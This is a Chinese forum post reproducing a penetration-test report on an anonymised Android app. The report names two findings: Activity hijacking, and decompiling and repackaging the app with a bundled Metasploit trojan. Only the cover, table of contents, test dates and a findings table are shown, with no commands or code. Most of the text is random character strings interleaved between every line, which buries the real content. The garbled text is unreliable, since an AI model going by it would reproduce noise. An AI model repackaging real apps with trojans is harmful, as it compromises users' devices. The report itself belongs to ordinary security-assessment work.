找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4603|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/ b; M" w8 f- Y+ a$ Q! _ s' I # c" ]6 }+ E, e' [. Z7 X

! _8 Z2 |. K! P4 j& g 0 ]9 r, m$ X# [, D! D, ~. K
; S+ V. {/ Y7 T) F/ q A! G0 o# |5 E 9 R8 |, L. z$ @- z- B+ `, b5 _ t3 @

, Q6 [( j9 G1 N7 d- d0 {( r ; J* N9 u$ \ I
4 [' t# j, y I9 N$ ]7 v/ l, A3 a0 K ; O& f2 R5 f ]; J1 z% e' L

3 s+ C! r& {. `: E2 T) Y- A 5 |( F! s. @0 A0 C4 @! i8 x) { 文档编号:                + H2 G, t0 r" G8 q3 W8 _/ p* i( S: e# {8 }1 a

) E O9 s) O& f, H1 G! f9 z9 {* b) N" O . ^0 y/ Q/ e8 _+ P& @

2 S0 D% s3 w1 L& H/ L) ]' y/ g/ Q1 q7 V/ X   3 }' r2 B- q( g% q! }. Z$ I( _# z# ` ] U4 e. h& C3 [

5 P3 U# Z; l+ S' O! ]) I0 G3 ^3 |6 x- z5 `) v, v3 t) G7 X6 Z* O

6 G: C0 j; j, r! t) v0 c6 W; K: a* ?, H7 m" T g1 q4 @   / g* A- a8 ^% N3 s8 K5 b: h 8 z* Q b7 M$ {

9 N0 T; ^* i6 L/ j1 D- ~3 e8 \/ W6 W, O6 v

1 v. V9 C% Z0 X6 P1 L 1 A( W I, s" |9 x( G% l6 V7 M5 E. h   2 }8 L- G @+ Z4 {$ z* i* ^ N: }% `0 `. }

2 h1 ]7 P8 i9 r s! M; \/ W: E X: C' ?' b; ]' J6 {/ E k

* V1 V" P# J4 v% C$ z$ ~' K5 c) J$ o4 Z' l   7 G$ B9 [, n: h0 T. V: _1 S 5 D/ r1 @' }1 _4 d/ }; \

- W# _$ W z2 |- a 9 E0 z8 r( ~- R+ B" V

) {6 i" u( U6 W n6 D4 A . |$ l8 A9 D/ l/ f2 K5 P W$ {, ?3 ~   ; c9 v O: d, g6 k . X, n8 t1 j/ ^

, N- Z1 f4 o+ H/ g* ]# x# \# ` - J8 Y: Z4 _+ |% v

3 @- X: {3 R# E( |& F) m' d: F0 j c5 L" u8 M8 @ 某某某APP渗透测试 " |, i5 H5 v" F! W/ f: j' j, X . c. j4 A9 M- R. A+ {; ^

& P$ C* \5 g) P t7 \: O- G$ i; h3 ?# N7 t; j5 k

# e4 V) L- M* X. g' x; H0 y+ s5 f! s3 `+ V- E V* B   + U# c+ b. q) ?) R' n5 D& q! t ; M$ i% O# T; Y2 i; S

" H8 r# K. Z& M2 l9 a9 F' y1 X - U1 W7 V) g5 E' b! |) W5 |2 P! `

- ?3 |0 [/ E# c ; T7 x. l# S& p( D   + V* ~& W+ U H b) w0 ] + @- O. [8 l @ R1 C% r7 R

( }8 w/ H* f8 j5 r# g- T0 {6 b! f& G1 r8 q

9 r7 P i0 j0 k3 V# r 8 C& a! _# |0 i, A   ( l [2 Z& o% T. ]2 q6 A : O4 m& e8 C, O

. d& t+ X2 A& i # [) L/ ?1 [/ l

2 s* M8 p* }! |# Q" ~! |/ [2 p/ b3 d |4 I   : l$ _+ }4 z9 o6 D; {6 `5 _; \% Z" I5 ~# c4 u# _# S& a

* M# V& X. Y4 Q* }0 ]2 c9 b/ G + ]0 N$ d/ {! e; c l+ r# b

. c- b$ v& \# J) a/ l/ a7 O * i' a1 Z$ M8 w3 I# F 技 术 报 告 & e [, m& b: L5 @8 y2 n% V2 q ; n$ V* E* U$ o7 r$ `' _7 i: ^! W# f

! v7 U; g1 Y, k& e' ?6 q; i" I: [2 x# ?" V: R

' t. z' s; o6 \9 C5 p8 S; i& {) K4 I & i# {& r* |/ D* ?   $ a7 o8 l3 [# \8 o+ `5 J4 u # d+ r* G" @6 l( ?

/ ]' {: V! w9 X$ l; A5 J2 h1 a' U* I* t

6 p1 F h& k2 P" { s& k$ e6 G3 d; I6 J) N1 {0 {, _5 I$ S) v! r   8 G# C& ~: E4 W) o : [& j! s, Z8 m6 C) D4 ]

g( y a' M$ l2 O. H T; l2 K0 c. j# _! Q1 p

% b6 m) Q6 F; j5 Y8 n; z1 v ! S% [) r- b5 z   : `8 s. ^- x+ X9 c0 j! a! t; l) H2 | 3 _' H$ W8 d2 y( C

$ ^* y9 O; b4 y+ g% [ " z, R% w6 \' W4 W

- j$ r6 z+ J8 }7 N 5 _- A5 l I3 O9 v' ]* z   0 J- X0 ^, a; S3 B/ u 1 d; y+ G6 W& `( m

9 x7 j$ ]! S) A# t& Z# D2 Q3 o6 L% C' a# x: M7 j [

& w. F9 I2 m5 M8 K7 v* T6 o! ^* Z7 D0 a; s( B/ [4 {$ Z% \1 c   3 `0 w" Y0 _1 d/ Q- v5 h, P6 e* k 4 o& n1 r1 v; P

. j' }) j0 C' Z9 _& o9 i' n, J& L" }& q, v6 J% U/ E

; }' B2 M, ^( Y2 w4 t* ~. { & \ s) Y- o/ ~4 L% W; e4 M   ! w" r2 ?6 J3 F+ q 2 d+ m$ F, [+ |/ K

# b0 W' X4 r2 v' T @# } $ H4 N0 P7 h" Y- O% G/ z! C2 k

% q3 H$ D5 N' _" G5 \& X6 V! q9 \4 G @   - w! S1 V" F9 C- B& c7 _+ l8 m/ G ! d6 e6 C) Y5 |; b

: m4 W# ^9 g$ g1 `0 e! B$ W1 A+ n6 L5 j% y

9 m @" ]4 R7 u1 v! L$ J0 w5 t   : M4 r' e8 E! q' m & M6 Z: ~3 s! A/ J w

7 {* f. f) T0 N8 W: W 9 S( d" S5 e0 Z0 u

# l% d V8 r2 @: V( o7 p, L: p, i9 m4 h& T A% ~) N   ' ^5 i) o: v) _4 |2 X H2 F% R) S- b, W# U' Q" N4 w% e- J

$ q ?: S+ D& u. B4 [8 @9 b3 l0 ?2 k4 C0 M7 U( U8 k2 L

0 o; C' u/ F. i: e# s " y9 X7 j: W' ?" G/ U   4 p& Y( l9 B8 k5 A0 A# u; H0 z: M8 T! X( T5 e' o

* N: F8 b" |' Y . ?$ X, c* |6 C; H1 J4 s

- j! L* S: G, A7 _/ p( ~8 f 4 z% `2 H7 ~! g   + s& @; l9 W- {+ ~- ] o3 w0 E+ M5 j, b

. W8 E( }! O7 H8 A0 a1 Q) L; R. a( B$ K$ I" ^

7 M1 ]+ O n' F- E 2 V8 ]3 ~: R R3 Y5 o1 ~   : ?- D- K( e1 V, l9 {. ?" ] o! u+ s( P% y) G9 L% T) v

# o- p2 w2 w# m" B, L% I7 ~2 k2 c! G3 w$ v! Z: ]

- w U2 P. T( v$ ^/ } 6 Z: G1 o0 r4 E& m# ^0 I9 p9 q) j- U   1 X* p7 u4 ?- N' C$ `7 {0 N 9 T, l* B9 ^, m& U' ^2 q/ V

9 u: p0 B; q! g5 p6 P+ b; q1 s * [7 h4 q: C1 M& z

1 U& q+ Y8 T6 E) m$ e * X$ {8 y2 I2 C8 q' F8 C- O, l   9 i1 K- d) Y3 s" u$ @# ^2 U4 z& D# a

$ v( e# O, M8 q, ~8 ^" @ 5 u- Y6 Z, v; c+ D d+ B8 Y

7 ]9 Y2 O# A3 F% n( } ) P7 \1 s c; k6 f. r+ t   ( `8 Z5 e6 v& t- O8 Y; r% F) d* y8 w) r* n" \1 s

8 }5 ~* m! Z% }7 x: _( N8 ] 4 h$ m: b- G. x9 ? |4 f

. o, @ @, j% U3 H; j 2 l7 z& }4 W6 _! y( {9 o- ^   1 A4 G! r. [% f, @9 ?. v" o- e 2 a* p+ Z. ?8 S; M5 }

. D# E8 f. j: \* H" R2 V. p . R' j9 W7 a9 m' Q6 | I

" k5 U) W1 l! o- f* S 1 k/ l- ~' k) w& y( m   , z6 ^3 E$ X9 ^2 V' i4 }+ ^ ) F( D* M u8 H2 f5 U. R

$ l0 ?: P! b; u9 k% D9 s. \. | : f9 M2 W( l7 B% D6 p# L ~5 M

) ~3 _ r- u' U: l! k4 Y# [/ p# `6 y8 [# b( @, ?   ' ?* b# g1 M0 ?& ]9 l* j- D5 } . [$ }8 x( `& ? h! V( @

+ {4 z+ G$ k6 b: f M, X , T' U) l1 \* p/ W% ~

& e$ M V5 I2 Z* h; ^ 1 Y' d6 S9 b% _: ^+ F7 _ 二〇二〇年 1 ?4 D# | n1 j4 E5 y' q7 }. m% m0 m; w7 g- O p1 y: g

7 z1 K' n# G. ~" e2 i+ N0 k2 P/ m , v1 H( R! u; S* }8 T) _! S9 I$ E
8 T9 s5 P) ?1 d+ F" U* [ 1 O% W4 b% Y9 `7 \
; ` F$ S- |0 x) t 0 A \( K5 g: g) J' b- n
* O' m5 U! ~- [( M6 a5 @5 ^; R3 m- s- e- O, R
3 u$ ]1 _; ^8 H# X: W6 ]9 G7 k: ~: U. f2 d; D' U( C" z6 { \
" _: x( P, Z% w- I* v - m! L: d, Q8 W
' u- C) @$ `6 e0 U1 l5 h) D3 {6 {" n
" N5 H+ b, d3 M) v( n C; n9 B , H; W( r& \: p. T' p) G7 m
) O- _5 S$ j! @3 w1 S- r$ b! k" d; n! t( E I

) M2 _2 H: _1 F+ r& j ; \( u+ M+ v" o+ `4 a4 j; l5 o 目 录 + m! N* E$ O/ k( K6 e' g " T( w! B) h" b

: _, t7 g0 |& t h; a3 y; @, R: T 4 d* H) Z% w4 U( |" F 3 L8 m5 M; H" E% k. Q

; F& K# v$ i- a! `% E- | ( B" i! x# y6 A; y9 {# [5 ?/ [1 A   ; I! m" o/ [6 f, g: w. D1 ]$ k# R9 w

' h# z/ n9 M5 A4 l$ A& D, g, O 9 N& U7 O' B( R( @" d( ^

! }6 S" P; S5 z- _6 y" R ) L+ C' x+ k. _0 f! {2 |0 j9 n 1 概述... 3 ) G% g9 e3 U4 r! _ ?2 o& b! F2 j/ \4 J, X8 T7 ^, p

$ d* W. u( _: G 2 }7 D; R5 x6 m# c6 U8 J( b+ I0 X

! O: J. W% k. P; \: s$ d, o ; E# X: V3 ]1 z. ~% D) O 1.2测试时间... 3 1 v3 u" [7 e1 r, K3 c: S; a& _9 c4 T, f+ R

2 |) a% M- D6 l G2 }5 t, E0 \7 x* Y: r

; v5 Q Y1 n3 a Z [3 n% R' p: O5 K' [3 Y 1.3测试对象... 3 9 s" v( m) F: U( Z6 a( i7 Z* n; w$ H3 X7 a

; Y- T; R: X. V1 T 1 c7 i/ |2 _; O1 R+ o% G- `; B

: t4 |. \7 h# M" u' N 5 M7 f0 Q' I9 `: p4 D% t* L6 U 1.4测试结果... 3 + o8 `6 r# T8 D( T 1 u R( M4 @: T3 o( y, P' d* S

: P6 j% _* F6 o% Y& j* b' A+ ~# x; U

4 G" U2 ]5 ?: G, L, X& k; S. K ' [2 o& p) ~. _+ S 2 检测结果... 4 9 e' | T4 ~- D ]! c3 @, _ ) R4 l0 Y4 T6 `* ]( s0 j

- |2 k( S/ c/ p/ o1 ^ 1 V1 S$ b1 X6 k. o' w

4 {) Z8 C/ h N: `/ c. Y + g% q5 T( H+ b5 O% y- x 2.1 某某某... 4 7 a' { M0 w) Y1 w! U0 n4 [" `9 Q( F2 B0 t& n! e

# l7 X7 T% O. J) ^* h' X) A4 Z& y - i* s8 d& p! H1 o

4 S3 Z: g D4 Y) n ; D5 ^! j5 h; U8 p 2.1.1检测目标... 4 * G* w( I' s5 L! c& C$ w. E $ r: Q# q9 Z% d! j. H: Z

3 t* i6 \8 V z. ?$ X+ R% j7 g# H/ Q( z# G' |

% l' ?: k' i' ?0 O" ? ' _( P( Y+ \ S+ O% z$ K 2.1.2检测结果... 4 . [6 s, K2 f: J# p& B; A 5 q5 v! h9 S# Z. Q% Q' \/ e

8 F# r( O, D8 E" Y3 F) j& [' N/ ~& B

% u* m1 A s6 s( b ! K' Z, o) j0 k! n 2.1.2.1. 4 $ D0 k# U! ?+ q& u# z" C# G: m# r) a( b

: \ e' J( ` X) C/ y* W ( f3 z3 z2 {& C8 t

" u% H7 j# C- H , w) o6 h- X! u8 W/ P8 F; B$ i 2.1.2.2. 6 & h) G0 I, [4 C- r: c1 j & C9 z4 m0 ^( L9 B- t/ m

. l$ \! t6 b4 w: Y2 o: E 4 w2 U# p6 q' S4 \# `/ [

7 M9 b6 x+ R: B6 c" o9 D/ h3 d! N, P) Y / k3 K6 Z0 o# Z7 Q+ z, U- k/ K 4 Q9 ?8 E) e4 j* Y 5 H4 B# R: c7 o7 H r6 o

/ d1 ~0 c5 v' O+ U 8 {) z- t) \; H7 ~
7 C/ }( l% S- Z9 c) S9 b p! E! J, k0 k1 ]4 S' h
, ~4 }# R9 l: c/ r( x& I% U" a: Y! N" y2 [* K4 g9 k4 \, `
4 i* \+ i& E$ b9 y# Q + ^, K/ l1 V0 ]$ J: O! F
! \4 i* _! G, i8 k4 I: m6 ] G9 l* {# s7 R& G' l

. L/ E+ r4 V, m, ?: F; `3 Z: z8 }: q1 X 1 概述 T( ^1 x' W) y5 _ + G' b1 S6 x: w) d% P2 I

9 p& Y9 Z# E' i) @) i; C8 E3 M1 F( R* f* [% E4 H' Y

1 U0 n$ D- D% W: H9 m* Y; @ 5 q6 n$ ^3 u5 V* ] 1.2测试时间 7 i+ \' v0 R. u0 ]9 I7 A7 s/ z* B# T) J- C

$ k( ~7 |7 k2 B" j( B : Q" f9 t8 U4 m# L- q3 w ( b0 j V9 l) o! N4 s6 n" w$ F( ]' g. y$ l( w& l& p4 t- o% q6 Y7 r* u: o8 b! X+ T5 e+ L$ {8 T- s1 N7 @; e/ _3 ?; l Z9 ?) B2 S$ ~" w' E4 g( L$ W1 N( G! O3 {- e8 E- q; e* ~6 z0 h9 Z, b6 ~5 _$ f* g3 q0 t9 H; C8 f; F) u4 Z+ |: t; V" l' }) e$ R2 X. T( y' E" P& _8 o$ F; G& c2 I9 j) j b/ P+ Y% q0 Y' O# I( ~3 {$ H2 ~* _- ^. f% G6 [/ T+ T/ t1 f' v; |4 g. {; }+ e* {+ I' F! T6 T9 R3 U( G& T2 w2 r) c' I" x0 l4 h- m* j" p, O( D" z X- ?2 W2 s* P* R8 {2 T5 B" A: v+ o2 A% ~! w; ^0 S! ^, ]. ]; ~7 @ l; K M/ g; u. @' s8 }$ c2 f+ E# D. t* ~. C3 u* h" K. ]' ^* g4 k9 n- p" C1 K2 q1 `4 N# H' p0 o7 p' D6 t& ~1 _" V, B2 s( W" [# Y) i- R8 t3 A) R' h" r" L; R' ^% Y
% S* l9 m2 y+ Z# i( o: r5 @0 T2 g$ r1 `; ?

$ i* t8 ~) H9 V, ~$ w2 q 5 e. p, A0 B2 U- |2 U 渗透测试时间 * [" I! @! i" u8 B " k1 \' F' `: y2 D& N) E) F

* u) b* r. n* A) }/ W V% T5 I5 w8 l
. M, p' M1 R; ~: Q: I6 M: O4 ]6 H3 Z5 P7 y; F& \/ D

8 Q9 F% H4 N) c 4 }( q- f- f8 w l# A3 E4 x& H! t 起始时间 ) p) V7 i. v2 ]. E% y 0 ]8 q, {2 D) ?; E: h

! K/ q% z; \% C& g, A; i; Q. M# n2 Q& o& X# M6 j
7 H( f4 ]. {! n( T- c$ [ ! l9 }+ V3 Z( ~7 `+ J# P

7 A7 T4 p9 W7 B8 P. a - A0 B4 C) O7 K, t) E 202046 0 N) c& j% A Q/ ]. S [* ?) B$ O4 a& z A) s9 ?. {8 K

, N- }5 B& N: P2 O! Z; U 9 F4 g1 V8 T$ u) h L& s$ X0 X
- ^; B& c( x) ~$ g( P( v+ R4 E G2 ]/ z. m& e3 O

: w6 @2 A! ?* h$ B$ A" p; ^ ' ]# K# ^- S; u7 K, n 结束时间 . Z8 u3 \! n1 J, @* u* l4 \7 [" j7 j: Y$ O' z1 z( m9 p

9 p8 C; `4 W( @4 m . d5 U; {' G$ r5 s' w4 e. F
) C0 E9 s+ e7 i6 M 3 q; f' ?4 V6 Y7 i# S0 m

9 |* ~. \2 t: X0 Q$ V + q. ~7 P7 r; R s: Z, { 202049 # G5 g, g X# r# x8 w8 F- [3 _2 p1 p5 o, `" g1 |. M4 c1 j

! i+ ? h8 K+ K" ^3 K; S7 } 3 K& x3 G/ [1 y- b, [
, \7 l4 H- Q7 z) M4 X( B; D7 u7 R$ L' h% @( T1 z5 C

- J: H* t" A; |7 Q ! ?2 H/ C1 z% A- W1 { 1.3测试对象 + V. T7 R2 W* H 5 A$ K; t, V; r6 D+ N) b, X

& u5 M" f5 o$ g6 V4 G' D ; @$ t d. _7 X

X/ g8 h, i% R" V J9 I' v) B7 P Q5 w& T2 L8 ] {7 j! p 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: : b) `9 B4 `- G0 s5 x0 U - ]3 R8 Y$ A; h: T

3 u1 h. a& P0 {5 d& k ) Y( U& D6 S8 g% y$ h- A, z

5 e0 }+ l8 g7 {1 Z+ e9 a2 [( Y; d/ F: d1 i) { G1 v4 X; I 1-1 检测对象 : d8 ]& X6 F9 W" M" o1 W q$ G7 H8 s" ^- x: W$ h! w: U r

/ j& Z6 P9 X) \4 V. s8 e# b0 ~ ' U+ c; E- u& }7 ?4 D2 c 3 }/ |! v/ R6 m3 q3 O5 h) h7 t, `% O1 T* Q, z+ O/ U! v5 G4 S: N( {. W0 j9 Y5 q3 }( L7 z) P0 {# D, Y3 p! V4 v8 [- g% {6 R6 @. T2 `0 u0 |* n& u# v& W! f( G9 I+ }$ g% }* E$ |- ^( `: t: J# O1 ^1 O' y% i0 G& L2 [0 g7 p3 f4 y$ b v( {4 K. ?1 f% L2 m7 _5 b& F6 q3 D& X1 b3 u1 Y5 {2 @: F, c3 R X$ D; y$ N0 F1 k5 V8 C5 W" z7 z% R& v. x$ b& D) c1 {8 Z3 E, j" r, t# ]+ g1 t0 c+ F: |- A. v, u! f; X& a W2 y" {$ {. p! ?+ A" ~; B- y: j; @/ n( u: X1 N' z3 D6 a" b' u, g7 k+ f( }$ B- I" l9 z! S+ o4 h8 I$ n2 I8 q. Z( d0 |5 `1 a b1 [7 O$ z( W+ g" R$ o l. ]0 Z8 v. Q! x6 l* X. Y8 h/ k L0 Y) H$ G6 }5 ^2 I( m3 F }3 Q5 r K2 c- e3 h5 X5 c2 ?4 ], i, h! `6 ^, S! n) U# h) e, k9 ^0 |" E# q) W7 V: H" H" Y( {5 J" C A4 s4 }1 M
! O& j! ]$ S$ \ ! e6 Z( {+ D+ S* G1 s2 A% a

$ s/ g) m2 i0 Z9 x & {+ V% U" h- o* r+ ^) \9 V 序号 % k9 ?/ F5 e8 K& c, ~ / M y! l! t. r4 z: H/ A! @ s. k8 y/ `

* g1 C( c% l; t! d6 X% F $ n& I8 t3 U# N' F! F- s3 }
4 J4 |+ m g P1 t) ^; c % i; M! y; Q: T) T3 |! y. E/ |

) l9 ]1 z( z8 u8 k# E * M V4 ~) F( n* d3 B, ~8 `8 h 测试对象 6 p, Z& o; z5 B1 L" e5 s$ C/ q; _3 G$ ]" q2 u- w! P

l% g" a1 e; N- q6 u 1 p- ?9 K" v% \# K
' m8 f" }* m- Q, i4 s* Q1 a* k& F3 U* X

6 g% h7 O5 G2 L/ n " q0 _5 n& v8 B' z- T+ v9 {3 ?$ E 测试地址 # r5 C" L* {6 p4 ?# ]8 s' ^5 Q ! G* a" G* h+ r+ `

, C$ F+ X' W2 V6 t: H) {$ e( c. ?- d% o0 B, I- }7 ]) }
0 h" a# s/ ]2 U, I8 p2 p; z) C+ F& Y6 d0 q5 }

* N& X4 X+ N6 X, n # U3 P" z% s1 `+ F( M- @ 安全漏洞 5 N2 O$ c c4 v7 Y4 x 1 T) [+ X" x4 k0 g" a4 [! x; S

& [, j4 q" _3 t3 R! C* p+ m 8 K4 M3 N4 o0 ?" o
5 x0 X4 _7 V a $ h: V8 S! J! Y) K

' L8 G" c1 r4 I) N( F; p4 M * X6 ~4 @- m' ] [' o, C 1 * T w# R9 i' q( y: Q" | 0 e# D' o& g0 ~6 [

4 C& ^4 Q3 F8 y* l( a( d6 H# @0 s- o( M! c- l( \# C! k
% z& T2 i& A* b6 E; K0 E6 H8 a+ J, ^6 r: w5 p* W7 y

3 A* O+ _' @3 i: n 5 Q4 j3 w" l# x$ z7 o; D( _ 某某某安卓APP 0 `- U1 H8 w' B1 P" d- t 9 P1 M' D9 |1 }/ b. B: y

% b8 n! c. A2 Z, {' Z6 h; p# Z3 S$ n5 j' _; u, F
; U, h+ F0 ]6 |- E+ d, d 2 p* D4 A' H" ?* c. L- k5 E. N

- e7 n6 B& |6 F \1 ~# I' r1 O 2 ~# q2 l+ ~7 |' k6 R8 D7 P   5 L. b& v j! V* `% o6 e6 p& F# T# j

3 `; b: Q3 A, r5 l9 q% R4 N+ c! m 0 W5 Q$ Q+ b, c# Q" n5 G5 h
) B0 L0 A8 X3 i % e* L! A& ]7 P

6 l4 J' _2 p1 `. |7 {, C- `( }0 I+ _2 M+ `; w, s 2 8 @& g" ^+ ?! Q" ~7 Z6 U! d . ?. n$ f0 z: }- d

, C2 I( I$ G T) v! [0 J 8 p8 U3 B0 K( M6 |$ C! I M
9 p- K6 |: [* q - \1 K1 x) G! f7 b# J

, ^ P8 [( |4 P+ g0 r* O \4 \0 \ 1.4测试结果 5 o8 b( l& V6 o1 I0 l " Q- v1 K. V8 ~: a e

: H) u9 D+ u+ J* E3 g0 A, o : r5 x' h8 A9 y" p, s7 e

4 H/ |1 O6 T: t ' {& m, Z ]5 G 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: , K p; o8 I! I' S+ D3 V" X $ F/ e) Z6 E! M4 ~* F. s; J

7 h! q* p' \/ w3 {5 M3 y 6 I' o9 H& z1 y! O; E3 y; v6 @, H n

" E b# \8 d g . `+ c K) M8 u" f   4 h2 b; N' ~' Q9 C% C# W& N9 g ) J- H0 q/ ?. |+ t: U5 B

5 M' W3 e! s" l0 k , s6 C0 ~9 q2 Z* D' T9 Z7 C: {" A
9 T' u% Z6 ^6 _- B) P( F( F$ R/ N" T" b" r' x" u5 \ & W. ?( g% N" T0 J4 J& B" ?0 x2 i6 I1 Z; V6 u0 E3 c: c1 y* Y$ l1 N# V5 q2 o0 g; y+ J7 h- ]/ V0 ^+ D: Q4 K- i' w/ Z5 `$ v4 M9 Z7 @+ l: ~6 F! M0 f2 O0 B% j% g; w2 h1 v6 O0 Q, M- K7 l* A1 e% r, R* Z5 g, @3 T, X u }5 u( p/ I6 X$ C) X1 d2 n: w9 o0 B+ m) w5 `! z: w( e, H" z. {5 F a0 x% v" M( \- {8 u) H3 V& s+ ]' {( I! A, S+ k, Z( u2 V- f% k5 M% ?) w8 N; w% g# B, ?) L3 f5 L* l* {* }9 f2 G4 b$ ?7 j) |9 m$ o, H b& Q0 q+ s/ {; f4 x, v z8 R4 Y" V1 n8 P1 `8 Z2 |" ^" Y) t8 z# o& ]/ S; a. h/ F& E2 W6 W) h& n9 h/ b# T) B+ F) V; y: I; ]- o% {' ^, Z& Q5 H5 v2 o3 N) |) h/ x* V s# N8 I5 m4 _: D# \! m1 K* y8 W B9 X9 k; W) t- ]1 T- f: D' h! Q$ [! q5 ^7 i1 t; l: b2 s' v; S$ |" m5 W5 n, C+ ]* I5 Y7 E( |6 u$ V5 d9 l/ d( E& `8 t& t) H) }( D4 S/ G7 |' ]; y/ k8 o; u( Q) v7 M& r/ k! I/ E# V7 |' ]2 z1 M% F; [" y# Y2 c: o' t7 G& f) j+ o7 G \2 G% L: m& f$ Z5 \7 }8 K! x4 h3 x3 H4 W2 O( L8 C: _; e) u( V5 |$ }/ K6 ^6 H ^3 J# i/ [9 b' F1 E4 [. K! x- y1 X4 K2 o/ x$ h) [8 b! Y7 ^0 f/ ]4 q4 s Z7 f. p' A, ?) m+ ?! h, |# P% `+ f6 R! x# }' W, `5 y' N/ G( r5 Z' x9 v
% Y# ^8 F \7 N$ U# I+ l+ i3 N) N t0 i, Q5 [2 Z

0 \% T4 {0 V5 e z, F t! j' h1 i3 e/ s0 J6 X# z 序号 p9 }2 U& R2 i) W5 A' i# k " m3 f% [% y/ @% S6 S6 A: O7 N

. P) T1 ^) {$ D/ u 1 ~& e2 k2 t: R1 f- i+ l3 w
" x3 C8 {7 q1 g: i# W - b/ n/ o7 {7 R# @

9 n- v- a3 E/ i! E0 q4 [9 C: z, f1 s J( `/ ` ]; d5 | 系统名称 ; e2 t. e8 d% Y* T/ u' J/ h, `$ K: W& z+ \# E) d. A. D7 q

6 i' {0 \$ J: h0 ^8 c/ X % h; S) x- Z3 U* j/ L, B W
' b0 j5 x" h5 v+ H ! P) f2 v4 L, s; g! O

0 L: B1 Z2 W6 K4 D s # ?! E' h7 ~+ Q1 Q; T 漏洞名称 % x+ R5 p+ \* ]/ e9 h( t A3 t& J( S. ^

) ~, Y/ x. h: d' U. S% |; L$ H6 P( j " K) p. o+ d* c% W4 w" X& g
0 J3 H/ [# g% x1 ` K) Y 7 I' f/ V/ Y! M3 G( E& o

' P1 ], ~. G4 ~3 H" n+ Q" D ; t: i. w3 j& b! ]6 |1 R, Q/ _5 d 漏洞危害 . f) }& m9 e5 y( v; }+ D/ c( g" Y, C0 _7 K' k

( f. k% l6 \% B1 E- r- a) g: U2 ?0 j$ D: g
& @- v3 `' @$ |" o2 S& {2 T6 ] x* q " P( P) F4 r2 C2 J

4 j8 r: }2 Z: }* z4 t% R- A& W4 ^- }+ K' t8 L0 \+ Z 修复结果 3 M$ V. K* p* p( S8 r, a Q" D/ n ) j. v& t1 e$ D$ C

( |) h- N; g" s/ @/ a$ |, n! u4 X2 |7 y( \5 R
- \! Y3 m; h/ E \ 2 g: G" N+ a( f+ f0 d

2 p I# `0 c/ O7 Z$ u* f 2 T7 o% c2 J1 Q" F* q. I8 g& f 1 0 c ^, [6 ?& M4 ` 2 n- l/ ^# l7 P7 _8 F3 R

: \5 b% @7 E0 w8 a# F / j9 L8 `6 N! m& H) j! u6 w
# _, R5 v, v, O* ]8 a0 G* D- T: I8 s/ @0 L7 l, _5 Z

N4 t8 K% y9 C$ Z* o7 ~- m( f" _ ' V8 y) y' Z) D; X5 r! | 某某某某某某APP 5 ^, L; a; w6 o P: T O; Z& s$ u& n: d- e% C/ v" L

" h% S/ y( ]7 _. A9 Z 1 q4 U) D) k3 s9 Y; ~8 V
- f% k8 F+ L/ `: i; ]: J2 | * D) Z5 j+ f5 S4 }$ R0 M d. r

r) W( _& p3 ^- m+ h2 k3 F' J$ R/ ?5 A/ U E: _) P Activity 劫持 ) E' l5 h- P5 H& c; {; J# V5 K* n$ Q

+ I4 x0 [1 k! `* Y, e! f2 ~7 Z; i 6 f% E+ x5 k6 t

1 O* H: @8 b0 P" P3 s+ b8 N+ l) r1 L% B6 |8 H, R# R   : B" h( i7 V& t# |& j: i0 t% l ) q7 _+ |& w; q# R4 Q4 y/ a

2 b; b8 ?$ j) `! \; r% o ' Q. k2 `$ ~/ W w( v
0 z: d9 I' V4 {% K2 n" x% t y, x, m! M0 V0 ^ h5 Z5 q0 L, i

7 b6 q" [# |+ B# X+ @ 2 X. E$ [2 g( u/ u7 x% A ( k% X1 n. e) D. u7 M( O$ t 6 i; _$ e9 o+ n0 z6 k! t9 O

7 E+ P! [, ^2 m, z; Z; T 8 Z* k8 W [) E2 [. ^% H; j; m4 }6 |
2 g6 v+ f% [0 O% c9 D3 p( p6 t - D$ s( V0 D: k0 |/ x) x

8 K# B' d& L8 h) g, T - d3 f: Q' Z5 Z   . `' h) r3 A1 r: G& l; ]9 {/ i' K* w9 C w1 M3 M

( w3 D- i( _5 l. {9 Y ' k1 `( }# @0 m4 r8 S1 Q* O
+ y. ?# g+ \% L0 L, f# w 5 c% _4 P" y& b$ H- c k+ ~3 M

6 {3 h8 M$ r. \6 y. U ( _$ C) [# |6 ?( M, I: e 2 j8 P/ O4 R' |) l4 w8 c 6 _# |" U% o: t0 ?8 p

# N! M1 x% C* k; ^" D3 ]$ m E" e + J% J+ m0 r- B/ a2 R! Q
8 Z* J! z" p0 j ; ~+ P" n( c) p( s6 K. n

/ V2 C0 B3 G+ U% R/ ~3 N z2 O" \/ L : y: a' I; _: i/ j$ D- `- a4 s) W 某某某某某某APP . v" o% Y+ O* W$ T 9 o" Y2 Q( z& x: q5 \

5 I9 b( v+ V, P& W 3 H4 v5 m0 Q& D, O) c' b x6 W" @
0 ?8 M! y$ d; G* \5 {2 } - x2 `! r' F5 N: G

! P% Q' w( }" s2 ^+ j# d& K 1 D# E9 S$ P/ }7 |' K0 M1 d 反编译二次打包捆绑木马、篡改APP代码 , G1 J: p, J e6 ^/ z5 D, I ; H/ _! n0 O2 F. T+ Y

* h9 v9 ^8 u& v4 w8 c 0 o* b; G7 v, @' N1 X
) T* O5 W. N) ~4 i; ]( o" @ ! O' q8 l' h* \' V. b) |0 b

/ U2 q! J" L) ?' A& X/ Z% I0 s - A1 J& S u y* v$ H0 s 3 D+ F- |6 a) E- A+ L + O3 s W( B$ u+ E! H! X

9 [/ |% g p$ t' b/ {( _8 {5 F* f$ s8 W$ T- `" k
5 q. q: ?+ ]# Q3 ~3 a! h3 l; _, _: l6 Y0 L" M7 @) e4 \! Q- c

, c3 i6 k: K5 W; x , i* |3 g. ^1 ~7 z, w/ Z, k: R/ o: e   5 V2 Z" w- A3 ~* _" M. \ ; a( H+ b" z3 ?2 ?0 l4 }2 ^

! E, y4 B$ t% d+ |0 e ( F# O; L' Q9 T4 c' i5 `/ H$ [
' Z" Y$ k; c# @- R) Q- h! j P 7 J4 H* S) j% P. K
+ |4 ?3 b, j7 ~1 S8 y " E) X0 M& u2 |9 q- f: {- r/ m

